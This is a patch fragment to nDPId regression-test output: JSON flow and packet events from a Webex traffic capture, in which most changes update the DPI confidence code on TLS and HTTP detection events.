-01002{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1251,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699074,"flow_last_seen":1444570699636,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1382,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1444570699636,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"c800cea031c10ffe47e1d72c9264577a","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -01342{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1259,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1444570699074,"flow_last_seen":1444570699643,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5712,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":1444570699643,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","server_names":"*.crittercism.com,crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"c800cea031c10ffe47e1d72c9264577a","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL Wildcard, CN=*.crittercism.com","fingerprint":"68:8B:FC:77:1E:CA:80:33:0C:A9:0E:29:A6:E4:0D:FC:3A:AE:43:18"}} +00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1241,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699096,"flow_last_seen":1444570699201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1444570699201,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/registerDevice","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} +00849{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1243,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699096,"flow_last_seen":1444570699202,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1444570699202,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/registerDevice","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} +00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1245,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699101,"flow_last_seen":1444570699212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":334,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1444570699212,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/applicationOpen","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} +01002{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1251,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699074,"flow_last_seen":1444570699636,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1382,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1444570699636,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"c800cea031c10ffe47e1d72c9264577a","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +01342{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1259,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1444570699074,"flow_last_seen":1444570699643,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5712,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":1444570699643,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","server_names":"*.crittercism.com,crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"c800cea031c10ffe47e1d72c9264577a","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL Wildcard, CN=*.crittercism.com","fingerprint":"68:8B:FC:77:1E:CA:80:33:0C:A9:0E:29:A6:E4:0D:FC:3A:AE:43:18"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1271,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699916,"flow_last_seen":1444570699916,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699916,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1271,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1444570699916,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699916,"pkt":"ABoRAAACABoRAAABCABFAAA8M+lAAEAGPjwKCAABUEpuRIMPAbsBc+gmAAAAAKACOQj74QAAAgQFtAQCCAoATNvPAAAAAAEDAwY="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1444570699917,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699917,"pkt":"ABoRAAACABoRAAABCABFAAAoA3lAABAGnsBQSm5ECggAAQG7gw\/+jBfZAXPoJ1AS\/\/9icAAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1444570699917,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699917,"pkt":"ABoRAAACABoRAAABCABFAAAoM+pAAEAGPk8KCAABUEpuRIMPAbsBc+gn\/owX2lAQOQgpaQAA"} -00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699916,"flow_last_seen":1444570699968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570699968,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1282,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699916,"flow_last_seen":1444570700123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700123,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699916,"flow_last_seen":1444570699968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570699968,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1282,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699916,"flow_last_seen":1444570700123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700123,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1302,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570700561,"flow_last_seen":1444570700561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570700561,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1444570700561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570700561,"pkt":"ABoRAAACABoRAAABCABFAAA8d7ZAAEAG+m4KCAABUEpuRIMRAbsN6aumAAAAAKACOQgrqQAAAgQFtAQCCAoATNwQAAAAAAEDAwY="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1303,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1444570700563,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700563,"pkt":"ABoRAAACABoRAAABCABFAAAoA4lAABAGnrBQSm5ECggAAQG7gxHyFlRZDemrp1AS\/\/9ibgAA"} @@ -273,28 +273,28 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1305,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1444570700565,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700565,"pkt":"ABoRAAACABoRAAABCABFAAAoA4pAABAGnq9QSm5ECggAAQG7gxLZgCjIJn\/XOFAS\/\/9ibQAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1306,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1444570700565,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700565,"pkt":"ABoRAAACABoRAAABCABFAAAod7dAAEAG+oEKCAABUEpuRIMRAbsN6aun8hZUWlAQOQgpZwAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1307,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1444570700565,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700565,"pkt":"ABoRAAACABoRAAABCABFAAAoCyZAAEAGZxMKCAABUEpuRIMSAbsmf9c42YAoyVAQOQgpZgAA"} -00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1308,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570700561,"flow_last_seen":1444570700615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570700615,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1310,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570700563,"flow_last_seen":1444570700616,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570700616,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1312,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570700561,"flow_last_seen":1444570700767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1313,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570700563,"flow_last_seen":1444570700767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1308,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570700561,"flow_last_seen":1444570700615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570700615,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1310,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570700563,"flow_last_seen":1444570700616,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570700616,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1312,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570700561,"flow_last_seen":1444570700767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1313,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570700563,"flow_last_seen":1444570700767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1408,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570712008,"flow_last_seen":1444570712008,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570712008,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1444570712008,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570712008,"pkt":"ABoRAAACABoRAAABCABFAAA8BPxAAEAGfVYKCAABrfMAbtmHAbtwYOR3AAAAAKACOQhFnAAAAgQFtAQCCAoATOCLAAAAAAEDAwY="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1444570712012,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570712012,"pkt":"ABoRAAACABoRAAABCABFAAAoA7pAABAGrqyt8wBuCggAAQG72YePnxuIcGDkeFAS\/\/8cJQAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1410,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1444570712013,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570712013,"pkt":"ABoRAAACABoRAAABCABFAAAoBP1AAEAGfWkKCAABrfMAbtmHAbtwYOR4j58biVAQOQjjHQAA"} -00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1411,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570712008,"flow_last_seen":1444570712016,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570712016,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 